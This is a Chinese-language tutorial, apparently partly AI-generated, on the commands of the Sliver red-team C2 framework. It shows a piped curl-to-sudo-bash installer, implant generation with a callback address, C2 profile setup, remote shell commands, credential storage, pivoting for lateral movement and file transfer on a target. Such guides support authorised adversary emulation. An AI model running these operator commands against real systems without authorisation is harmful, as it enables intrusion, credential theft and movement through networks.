你是否还在为Sliver框架的命令繁杂而头疼?面对数十个功能模块不知从何下手?本文将系统梳理Sliver框架的核心命令体系,从基础操作到高级功能,让你快速掌握这个强大的Adversary Emulation Framework。
【免费下载链接】sliver Adversary Emulation Framework 
项目地址: https://gitcode.com/gh_mirrors/sl/sliver
为什么选择Sliver框架?
Sliver作为开源跨平台的红队框架,支持动态代码生成、多协议C2通信和复杂的渗透测试功能。其主要优势包括:
- 多平台支持:服务端和客户端可运行于MacOS、Windows和Linux
- 安全的C2通信:支持mTLS、安全通信协议、HTTP(S)和DNS等多种协议
- 丰富的植入功能:进程迁移、注入、令牌操作等
- 脚本化支持:可通过JavaScript/TypeScript或Python进行自动化操作
官方文档:README.md
基础命令体系
Sliver的命令系统采用分层结构,主要分为全局命令和会话命令两大类。通过help命令可查看完整命令列表:
sliver > help
核心全局命令速查表:
| 命令 | 功能描述 | 源码路径 |
|---|---|---|
generate | 生成植入物 | server/generate/implants.go |
profiles | 管理C2配置文件 | server/c2/c2profile.go |
certs | 证书管理 | server/certs/certs.go |
jobs | 管理C2任务 | server/c2/jobs.go |
sessions | 会话管理 | server/core/sessions.go |
快速上手示例
安装Sliver(Linux系统):
curl https://sliver.sh/install|sudo bash
sliver
生成第一个植入物:
sliver > generate --mtls 192.168.1.100 --os linux --arch amd64
高级功能详解
C2通信配置
Sliver支持多种C2通信协议,可通过profiles命令管理:
# 创建HTTP C2配置
sliver > profiles new http --name my-http-c2 --domain example.com --port 8080
# 查看所有配置文件
sliver > profiles list
C2协议实现代码:server/c2/
会话管理进阶
获取活跃会话:
sliver > sessions
# 切换到指定会话
sliver > sessions -i 1
# 在会话中执行命令
sliver (SESSION) > shell whoami
会话管理核心代码:server/core/sessions.go
凭证管理
Sliver提供凭证收集和管理功能:
# 添加凭证
sliver > creds add --domain example.com --username admin --password P@ssw0rd
# 查看凭证
sliver > creds list
凭证管理模块:client/command/creds/
实战应用场景
场景一:横向移动
利用Sliver的pivot功能实现内网横向移动:
# 创建TCP pivot
sliver (SESSION) > pivot add tcp --lhost 10.0.0.1 --lport 4444 --rhost 10.0.0.2 --rport 3389
# 通过pivot访问目标服务
sliver (SESSION) > rportfwd add --pivot 1 --lport 3389 --rhost 10.0.0.2 --rport 3389
Pivot实现代码:server/core/pivots.go
场景二:文件操作
在会话中管理目标文件系统:
# 上传文件
sliver (SESSION) > upload /local/path/file /remote/path/file
# 下载文件
sliver (SESSION) > download /remote/path/file /local/path/file
# 列出目录
sliver (SESSION) > ls /remote/directory
文件系统操作代码:rpc/rpc-filesystem.go
总结与资源
通过本文介绍,你已掌握Sliver框架的核心命令和使用方法。Sliver作为功能强大的红队框架,其代码结构清晰,扩展性强:
- 核心模块:server/core/
- 命令实现:client/command/
- 协议处理:server/c2/
要深入学习,建议查看官方文档和源代码,并通过实际操作熟悉各种命令组合。
提示:定期更新Sliver到最新版本以获取新功能和安全修复。
【免费下载链接】sliver Adversary Emulation Framework 项目地址: https://gitcode.com/gh_mirrors/sl/sliver
创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考
